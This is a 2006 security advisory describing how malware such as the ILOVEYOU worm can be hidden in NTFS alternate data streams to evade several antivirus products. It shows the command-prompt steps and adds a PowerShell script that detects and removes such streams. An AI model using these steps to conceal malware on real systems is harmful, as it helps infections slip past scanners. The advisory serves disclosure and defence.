[NT] NTFS Data Stream Malware Stealth Technique
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 5 Jun 2006 18:06:20 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
NTFS Data Stream Malware Stealth Technique
------------------------------------------------------------------------
SUMMARY
A stream is an NTFS file system concept that represents a property of a
file. Within an alternate stream it is possible to hide information of any
size, and the existence of that information is not shown by the file
system's normal listings. The only way to extract it is to know the
stream's name.
DETAILS
Vulnerable Systems:
* Panda Software. All products.
* ClamWin. All versions.
* Norman Virus Control. All versions.
* AVG Antivirus.
Immune Systems:
* Mcaffe / Computer Associates
* Avira Antivir PersonalEdition Classic
This isn't in any way a new technique; the first proof of concept of hiding
malware in an NTFS data stream was published in 2000. Apparently the
technique wasn't very popular, and as a result 75% (or more) of the
anti-virus industry has ignored it.
The technique is as simple as follows. Download a virus file, even an old
one. Call it, for example, 'iloveyou.vbs'. Next, go to a command prompt:
C:\>echo I'm an inocent file. > file.txt
C:\>type file.txt
I'm an inocent file.
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 8475-DDEF
Directory of C:\
06/03/2006 01:10 <DIR> Documents and Settings
03/06/2006 05:10 23 file.txt
03/06/2006 04:52 10.320 iloveyou.txt
03/06/2006 04:52 10.320 iloveyou.vbs
26/12/2005 00:51 <DIR> Inetpub
03/06/2006 05:09 <DIR> Program Files
29/05/2006 23:24 12 test1.vbs
03/06/2006 05:06 <DIR> WINNT
4 File(s) 20.675 bytes
4 Dir(s) 2.539.368.448 bytes free
C:\>type iloveyou.vbs > file.txt:virus.vbs
C:\>type file.txt
I'm an inocent file.
C:\>more < file.txt:virus.vbs
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@xxxxxxxx / @GRAMMERSoft Group /
(...)
---More---
Now, try scanning your system with your preferred vulnerable antivirus
product. The first file, 'iloveyou.vbs', stored in a normal data stream,
will (surely) be detected, but not the copy of it stored in an alternate
data stream of the apparently innocent file c:\file.txt.
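Since a scanner that only reads the main stream cannot see what the session above hides, the following script, an added example that is not part of the advisory, walks a directory tree, reports every named stream other than the default ':$DATA' (and the browser's Zone.Identifier mark), hashes each stream's body so it can be checked on its own, and can remove the streams it finds. It assumes Windows PowerShell 5.1 (for Get-Content -Encoding Byte) on an NTFS volume; the function name is the example's own.

```powershell
# Added example, not from the advisory: enumerate alternate data streams
# so hidden content can be reviewed, hashed and removed. Assumes Windows
# PowerShell 5.1 (Get-Content -Encoding Byte) on an NTFS volume.
function Find-AlternateDataStream {
    param(
        [Parameter(Mandatory)][string]$Root,
        [switch]$Remove            # also delete each stream that is reported
    )
    # Zone.Identifier is the legitimate "mark of the web" written by browsers
    # and mail clients; every other named stream deserves a look.
    $benign = @('Zone.Identifier')
    $sha256 = [System.Security.Cryptography.SHA256]::Create()

    Get-ChildItem -LiteralPath $Root -Recurse -File -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_.FullName
        # -Stream * lists every stream of the file; the unnamed default
        # stream (the content 'type' and the scanner see) is ':$DATA'.
        Get-Item -LiteralPath $file -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -ne ':$DATA' -and $benign -notcontains $_.Stream } |
        ForEach-Object {
            $name  = $_.Stream
            $bytes = Get-Content -LiteralPath $file -Stream $name -Encoding Byte -Raw -ErrorAction SilentlyContinue
            # Hash the stream body so it can be scanned or matched against
            # known signatures on its own, independent of the host file.
            $hash = if ($bytes) {
                ($sha256.ComputeHash([byte[]]$bytes) | ForEach-Object { $_.ToString('x2') }) -join ''
            } else { '' }
            [pscustomobject]@{ File = $file; Stream = $name; Length = $_.Length; SHA256 = $hash }
            if ($Remove) { Remove-Item -LiteralPath $file -Stream $name -Force }
        }
    }
}

# Walk the system drive and show what is hiding beside the visible files;
# add -Remove to strip the streams once they have been reviewed.
Find-AlternateDataStream -Root 'C:\' | Format-Table -AutoSize
```

On Windows Vista and later, `dir /R` in cmd.exe also lists the streams of each file, which is enough to spot the file.txt:virus.vbs entry from the session above by hand.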
ADDITIONAL INFORMATION
The information has been provided by <mailto:joxeankoret@xxxxxxxx> Joxean
Koret.